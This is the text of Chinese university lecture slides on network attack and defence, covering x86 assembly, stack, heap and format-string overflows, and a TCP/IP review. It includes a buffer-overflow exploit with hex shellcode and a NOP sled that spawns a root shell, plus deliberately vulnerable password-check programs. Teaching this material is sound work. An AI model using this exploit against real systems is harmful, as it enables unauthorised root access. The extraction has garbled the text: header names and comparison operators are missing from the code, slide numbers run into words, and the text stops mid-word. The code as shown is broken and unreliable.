计算机网络攻击和防护技术：第三课

1、1计算机网络攻击和防护技术第三课2OutlineProject topicsAssembly languageExploitationStack overflow attackHeap overflow attackIP Network review3Possible projects title要求：不能抄袭引用材料必须注明出处用标准学术报告文章模式4人一组，可独立完成第五周上交选题概要题目内容简介章节简要分析WORM 漏洞源，漏洞原理，攻击手段，攻击特点，后果，检测方法Code RedConflickerSlammer网络漏洞检测利用nessus 工具对软件学院实验室机器进行漏检测和分析，

2、并写出报告网络攻击利用metasploit 工具对软件学院实验室机器进行攻击测试，并并写出报告Cross-site scripting 漏洞综述网络安全技术发展规律报告防火墙技术发展状况综述网络入侵检测和防护系统发展状况综述高速网络入侵检测和防护系统体系结构移动终端安全技术（某个专题）操作系统安全技术（某个专题）云计算安全技术（某个专题）其他网络安全有关的题目4Overview of the 80 x86 Family Assembly LanguageNumbers1 BIT: 0 1 NIBBLE: 0000 4 BITS 1 BYTE 00000000 2 NIBBLES, 8 BITS

3、 HALF WORD 0000000000000000 2 BYTES, 4 NIBBLES, 16 BITS1 WORD 0000000000000000 0000000000000000 4 bytes, 32 bits5Intel Registers General purpose registersEAX: Accumulator RegisterEBX: Base register ECX: Counter registerEDX: Data registerIndex registersPointer registers and they are 32-bit registers.

4、 Mainly used for string instructionsEDI: destination index ESI: source index EIP: instruction pointer, point to the current instruction the process is readingStack registersEBP and ESP are stack registers and are used when dealing with the stackESP: stack pointerEBP: stack base pointerEFLAGSSeveral

5、bits flag that are used for comparisons and memory segmentsCan be ignored most time since no direct access needed. Segment registersRegisters store segment and offset 6Types of OperandsImmediatenumber which will be known at compilation and will always be the sameexample 20 or A.Registerany general p

6、urpose or index register example EAX or ESIMemorya variable which is stored in memory 7Assembly Instructions MOV: moves a value from one place to another.mov destination, sourcemov eax,10 ; /*put 10 into eax */mov ebx,20 ; /*put 20 into ebx */mov ecx,30 ; /*put 30 into ecx */mov edx,40 ; /*put 40 in

7、to edx */in assembler anything after a ; (semicolon) is ignored. very useful for commenting your code. 8Assembly Instructions push and pop: Two Instructions to use the StackPUSH: Puts a piece of data onto the top of the stack Syntax: push dataPOP: Puts the piece of data from the top of the stack int

8、o a specified register or variable. Syntax: pop register (or variable) call call a function, jumping the execution to the address in the location operand. Location can be relative or absoluteThe address of the instruction following the call is pushed to the stackExecution will return laterret: retur

9、n from a function, popping the return address from the stack and jumping the execution there. Example;push ecx ; /*put ecx on the stack */push eax ; /*put eax on the stack */pop ecx ; /*put value from stack into ecx */pop eax ; /*put value from stack into eax */ 9Stack FrameLocal data 2Local data 1S

10、ave frame pointer(SFP)Return address (ret)Saved instruction pointer(SIP)Caller framelow address0 x00000000Top of Stackhigh address 0 xffffffffFrame Pointer (EBP)Stack GrowthFunction argumentsStack Pointer (ESP)10InstructionsSquare bracket is used to deference as pointermov ebx+12, eaxTreat ebx+12 as

11、 pointer and write the eax to where it point to. lea: load the effective address of the source operand into the destination operandSimilar as the address of operand in clea ecx, ebx+8 ; load the address of ebx+8 into ecxint: calls a Interrupt processing subroutineint interrupt numberint 21h ; /*Call

12、s DOS service*/ int 10h ; /*Calls the Video BIOS interrupt*/11Control Flowjmp label jmp ALabel . . . ALabel:JA Jumps if the first number was above the second numberJAE same as above, but will also jump if they are equalJB jumps if the first number was below the secondJBE Same as above, but will also

13、 jump if they are equalJNA jumps if the first number was NOT above (JBE)JNAE jumps if TDe first number was NOT above or TDe same as (JNB)JNB jumps if the first number was NOT below (JAE) JNBE jumps if the first number was NOT below or the same as (JA)JZ jumps if the two numbers were equaljz ; jump i

14、f the zero flag is setJE same as JZ, just a different nameJNZ jumps if the two numbers are NOT equalJNE same as aboveJC jump if carry flag is set JG: jump if greater thanJGE; junp if greater than or equal toCMP: compare a value Syntax: cmp , Compare the destination operand with the source, setting f

15、lags for use with a conditional jup instruction12Important instructionsADD operand1,operand2 adds operand2 to operand1. The answer is stored in operand1Immediate data cannot be used as operand1 but can be used as operand2. SUB operand1,operand2 subtracts operand2 from operand1. Immediate data cannot

16、 be used as operand1 but can be used as operand2xor, or, andand , incdecMUL: Multiplies two unsigned integers (always positive)IMUL: Multiplies two signed integers (either positive or negitive) DIV: Divides two unsigned integers (always positive) IDIV: Divides two signed integers (either positive or

17、 negitive) 13Helloworld.sBITS 32 ; tell nasm this is 32-bit codejmp short one ; jump down to a call at the endtwo:; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; pop the return address (string ptr) into ecx xor eax, eax ; zero out full 32-bits of eax register mov al, 4 ; write sysc

18、all #4 to the low byte of eax xor ebx, ebx ; zero out ebx inc ebx ; increment ebx to 1, STDOUT file descriptor xor edx, edx mov dl, 15 ; length of the string int 0 x80 ; do syscall: write(1, string, 14); void _exit(int status); mov al, 1 ; exit syscall #1, the top 3 bytes are still zeroed dec ebx ;

19、decrement ebx back down to 0 for status = 0 int 0 x80 ; do syscall: exit(0)one: call two ; call back upwards to avoid null bytes db Hello, world!, 0 x0a, 0 x0d ; with newline and carriage return bytes14Assembly code to machine codenasmThe nasm assembler converts assembly language into machine codend

20、isasmConverts machine code into assembly codeHexdumpDump the machine code in hex outputformat15helloworld1.sBITS 32 ; tell nasm this is 32-bit code call mark_below ; call below the string to instructions db Hello, world!, 0 x0a, 0 x0d ; with newline and carriage return bytesmark_below:; ssize_t writ

21、e(int fd, const void *buf, size_t count); pop ecx ; pop the return address (string ptr) into ecx mov eax, 4 ; write syscall # mov ebx, 1 ; STDOUT file descriptor mov edx, 15 ; length of the string int 0 x80 ; do syscall: write(1, string, 14); void _exit(int status); mov eax, 1 ; exit syscall # mov e

22、bx, 0 ; status = 0 int 0 x80 ; do syscall: exit(0)nasm.pdf16ExploitationProgram is designed by people to follow the predefined flowExploitation is to use clever way to let the program do what you want to do, not what the designer/ programmer want itLaMacChia LoopholeUS legal system loophole1993 MIT

23、student David LaMacchia (Hacker)17ExploitationMost program exploits has to do with Memory corruptionTake control of running programs flow and hijack it to run the bad codeExecution of arbitrary codeExample:Buffer overflowHeap overflowFormat string exploitsInteger overflow18Buffer OverflowsC is unsaf

24、e languageOnce memory is allocated, no safe-guard to ensure data to be stored in the allocated memory only.buffer_overflow.pdfstrcpy(searchingstring, argv1);19Buffer Overflows#include #include int main(int argc, char *argv) int value = 5;char buffer_one8, buffer_two8;strcpy(buffer_one, one); /* put

25、one into buffer_one */strcpy(buffer_two, two); /* put two into buffer_two */printf(BEFORE buffer_two is at %p and contains %sn, buffer_two, buffer_two);printf(BEFORE buffer_one is at %p and contains %sn, buffer_one, buffer_one);printf(BEFORE value is at %p and is %d (0 x%08x)n, &value, value, value)

26、;printf(nSTRCPY copying %d bytes into buffer_twonn, strlen(argv1);strcpy(buffer_two, argv1); /* copy first argument into buffer_two */printf(AFTER buffer_two is at %p and contains %sn, buffer_two, buffer_two);printf(AFTER buffer_one is at %p and contains %sn, buffer_one, buffer_one);printf(AFTER val

27、ue is at %p and is %d (0 x%08x)n, &value, value, value);Show the memory content when program runsbuffer_overflow.pdf20Make use of buffer overflowProgram crashes are annoying, but it indicate a possible hacking to hacker. exploit_notesearch.cCorrupt the memoryControl the execution of flowWill execute

28、 command line argument between a single stringRun When program run, it spawn a root shellProvide the full control of the computernote_search_to_root.pdf#include #include #include char shellcode= x31xc0 x31xdbx31xc9x99xb0 xa4xcdx80 x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x89xe2x53x89xe1xcd

29、x80;int main(int argc, char *argv) unsigned int i, *ptr, ret, offset=270; char *command, *buffer; command = (char *) malloc(200); bzero(command, 200); / zero out the new memory strcpy(command, ./notesearch ); / start command buffer buffer = command + strlen(command); / set buffer at the end if(argc

30、1) / set offset offset = atoi(argv1); ret = (unsigned int) &i - offset; / set return address for(i=0; i 160; i+=4) / fill buffer with return address *(unsigned int *)(buffer+i) = ret; memset(buffer, 0 x90, 60); / build NOP sled memcpy(buffer+60, shellcode, sizeof(shellcode)-1); strcat(command, ); sy

31、stem(command); / run exploit free(command);21Stack-Based Buffer Overflowexploit_notesearch.c is one kind of stack based buffer overflow. auth_overflow.cExecutionSimple testing working fineBut can get access without right inputbuffer_overflow.pdf#include #include #include int check_authentication(cha

32、r *password) int auth_flag = 0; char password_buffer16; strcpy(password_buffer, password); if(strcmp(password_buffer, brillig) = 0) auth_flag = 1; if(strcmp(password_buffer, outgrabe) = 0) auth_flag = 1; return auth_flag;int main(int argc, char *argv) if(argc 2) printf(Usage: %s n, argv0); exit(0);

33、if(check_authentication(argv1) printf(n-=-=-=-=-=-=-=-=-=-=-=-=-=-n); printf( Access Granted.n); printf(-=-=-=-=-=-=-=-=-=-=-=-=-=-n); else printf(nAccess Denied.n); 22Memory OrganizationStackTemporary storage for localFunction variablesHeapDynamically allocatedLong term storageBSSuninitialized data

34、DATAInitialized datalow address0 x00000000high address 0 xffffffffTextCompiled program codeDownward GrowthUpward GrowthBSS: block started symbolRead/write accessDATARead-write aceessBSS and DATAData in these segment is executableauth_overflow.cExecutionSimple testing working fineBut can get access w

35、ithout right inputbuffer_overflow.pdf23Stack FrameLocal data 2Local data 1Save frame pointer(SFP)Return address (ret)Saved instruction pointer(SIP)Caller framelow address0 x00000000Top of Stackhigh address 0 xffffffffFrame Pointer (EBP)Stack GrowthFunction argumentsStack Pointer (ESP)24Stack operati

36、on when program exitSet the stack pointer (ESP) to the same values as the frame pointer (EBP)Pop the frame pointer (EBP) from stack, move the stack pointer (ESP) four bytes upward. Now ESP point to RET (Saved instruction pointer)Return, pop saved instruction pointer, move the stack pointer (ESP) fou

37、r bytes upward. 25Stack-Based Buffer OverflowWhat happened if revert the password_buffer16 and auth_flag declaration?buffer_overflow.pdf#include #include #include int check_authentication(char *password) char password_buffer16; int auth_flag = 0; strcpy(password_buffer, password); if(strcmp(password

38、_buffer, brillig) = 0) auth_flag = 1; if(strcmp(password_buffer, outgrabe) = 0) auth_flag = 1; return auth_flag;int main(int argc, char *argv) if(argc 2) printf(Usage: %s n, argv0); exit(0); if(check_authentication(argv1) printf(n-=-=-=-=-=-=-=-=-=-=-=-=-=-n); printf( Access Granted.n); printf(-=-=-

39、=-=-=-=-=-=-=-=-=-=-=-n); else printf(nAccess Denied.n); 26Off-By-One Vulnerability#include #include #include int check_authentication(char *password) char password_buffer16; int auth_flag = 0; strcpy(password_buffer, password); if(strcmp(password_buffer, brillig) = 0) auth_flag = 1; if(strcmp(passw

40、ord_buffer, outgrabe) = 0) auth_flag = 1; return auth_flag;int main(int argc, char *argv) if(argc 2) printf(Usage: %s n, argv0); exit(0); if(check_authentication(argv1) printf(n-=-=-=-=-=-=-=-=-=-=-=-=-=-n); printf( Access Granted.n); printf(-=-=-=-=-=-=-=-=-=-=-=-=-=-n); else printf(nAccess Denied.

41、n); #include #include #include int vulfnc(char *arg);int main(int argc, char *argv) if(strlen(argv132) printf(“Input string too longn); exit(1); vulfunc(argv1); return 0;int vulfnc(char *arg) char smallbuf32; strcpy (smallbuf, arg); printf(“%sn”, smallbuf); return 0; What is the problem with this pr

42、ogram?27Using scrip to make attack easierBASH SHELLPerlCommon to most Unix based machineTell Perl to execute the commands found beteen single quotes/hacking/booksrc perl -e print A x20;AAAAAAAAAAAAAAAAAAAAAny character, can use x# hexadecimal value of the characterCan apply to non-printable characte

43、r too. A = 0 x41, so can use x41/hacking/booksrc perl -e print x41 x20; AAAAAAAAAAAAAAAAAAAA28Perl String concatString concatenation can be done in Perl with a period /hacking/booksrcperl -e print A x20 . BCD . x61x66x67x69 x2 . Z AAAAAAAAAAAAAAAAAAAABCDafgiafgiZShell command can be executed like a

44、function, using $() formatperl_example.pdfCommand substitution and Perl can be used in combination to quickly generate overflow buffer in fly.29ShellcodeShellcodeOverflow a buffer into the return addressInject own instructions into mmemory and then return the execution thereOriginal meaning: spawn a

45、 shell (rootshell) used to control the machineExtends to spawn a method that can be used to control the machineOpen connect back portshellcode_example.pdfWhen a new instruction can be injected in and execution can be controlled with a buffer overflow, the original design is voidAllow programs to do

46、things it was never programmed. NOP SledShell CodeRepeated return address30Using environmentSometime, buffer is too small to hold shellcodeUnix/Linux environment variable is in stack, shell code can be placed into there. shellcode_environment.pdf31Heap-based overflowOverrun allocated memory from hea

47、pModified some file/variable in the programChange the file/variable contentThe changed file/variable will then take effectPassword fileRunnable programheap_overflow.pdf32Overflowing function pointersWhat is function pointer?struct user int uid; int credits; int high_score; char name100; int (*curren

48、t_game) (); Struct user player;overflow_function.pdf33Format String Overflowprintf(“ A is %d and is at %08x. B is %x.n”, A, &A, B);Address of format stringValue of AAddress of AValue of BBottom of StackTop of Stack34What happened if no enough parameters are passed?printf(“ A is %d and is at %08x. B

49、is %x.n”, A, &A);B can be printed out: B is b7fdbff4format_string.pdfAddress of format stringValue of AAddress of ABottom of StackTop of Stack35The format String vulnerabilitiesprintf(“%s”, my_string)printf(my_string)Which is better? Which has problem?format_string_vulnerabilities.pdf36Read/Write ar

50、bitrary memory addressAny memory address can be readAny memory address can be writtenformat_string_read_write_any_memory.pdf37OutlineBasic Networking:Some network attacks host-to-host datagram protocolsTCP Spoofing, Attacking network infrastructureRoutingDNS38Core NetworkISPISPInternet Infrastructur

51、eLocal and interdomain routingRIP, OSPF (intra-domain routing)BGP for routing announcements (Inter-domain routing)DNS (Domain Name System)IP address to name ()39TCP Protocol StackApplicationTransportNetworkLinkApplication protocolTCP protocolIP protocolData LinkIPNetwork AccessIP protocolData LinkAp

52、plicationTransportNetworkLink40Data FormatsApplicationTransport (TCP, UDP)Network (IP)Link LayerApplication message - dataTCPdataTCPdataTCPdataTCP HeaderdataTCPIPIP HeaderdataTCPIPETHETFLink (Ethernet) HeaderLink (Ethernet) Trailersegment packetframemessage41Internet Protocol (IP)ConnectionlessUnrel

53、iableBest effortNotes:src and dest ports not parts of IP hdrPart of transportVersionHeader LengthType of ServiceTotal LengthIdentificationFlagsTime to LiveProtocolHeader ChecksumSource Address of Originating HostDestination Address of Target HostOptionsPaddingIP DataFragment Offset42 IP RoutingInter

54、net routing uses IP address 32 bits for IPV4128 bits for IPV6Several hosts for a routeMegTomISPGateway/router21SourceDestinationPacket2143IP Protocol Functions (Summary)RoutingIP host knows location of router (gateway)IP gateway must know route to other networksFragmentation and reassemblyIf max-pac

55、ket-size less than the user-data-sizeError reportingICMP packet to source if packet is droppedTTL field: decremented after every hopPacket dropped f TTL=0. Prevents infinite loops.44Problem: NO src IP authenticationClient is trusted to embed correct source IPEasy to override using raw socketsLibnet:

56、a library for formatting raw packets with arbitrary IP headersAnyone who owns their machine can send packets with arbitrary source IP response will be sent back to forged source IPImplications:Anonymous DoS attacks; Anonymous infection attacks (e.g. slammer worm)45User Datagram Protocol (UDP)Unrelia

57、ble transport on top of IP:No acknowledgmentNo congestion control46Transmission Control ProtocolConnection-oriented, preserves orderSender Break data into packetsAttach packet numbersReceiverAcknowledge receipt; lost packets are resentReassemble packets in correct orderTCPBookMail each pageReassemble book19511147TCP HeaderSource PortDest portSEQ NumberACK NumberOther stuffURGPSRACKPSHSYNFINTCP Header48Review: TCP HandshakeCSSYN:SYN/ACK:ACK:ListeningStore SNC , SNSWaitEstablishedSNCra